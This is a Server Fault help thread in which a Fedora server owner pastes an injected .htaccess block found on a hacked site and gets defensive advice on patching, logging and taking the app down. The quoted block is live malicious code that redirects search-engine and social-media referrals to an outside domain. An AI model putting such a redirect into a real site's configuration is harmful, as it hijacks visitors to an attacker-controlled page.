# my server is infected

Tags: fedora

> **Possible Duplicate:**
>   [My server's been hacked EMERGENCY](https://serverfault.com/questions/218005/my-servers-been-hacked-emergency)

I have a fedora server which I use mainly for a webpage. Two days ago I've noticed that the source files of the web-app were modified. Luckly I have back-ups and I use git.

Here is a sample of how my .htaccess looks:

```
#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://michaelmazur.net/xml.php [R=301,L]
</IfModule>
#/c3284d#
```

what advice do you have for me? What can I do?

Comment: Thanks for noticing us. Do you have a question? :-)

Comment: @JannePikkarainen: yes, my question is at the end of the message.

Comment: http://serverfault.com/questions/218005/my-servers-been-hacked-emergency

Answer (score 4, accepted):

Fix the web app.  If it's a third party app (Drupal, WordPress, etc) update it.  If it's homegrown then find the hole(s).  Look at your web server logs to see what was accessed.  Turn on comprehensive logging, especially something that will include query strings.  Plug all SQL injection holes.

Give us more details if you need further direction.

Comment: what can I do until I find and fix all the holes in my app?

Comment: Honestly?  Take down the app.  Otherwise you'll be in the restore loop until it's fixed.  If it comes down to it you can find IP's in your access logs and do blocking, try things like fail2ban etc, but that's just a band-aid.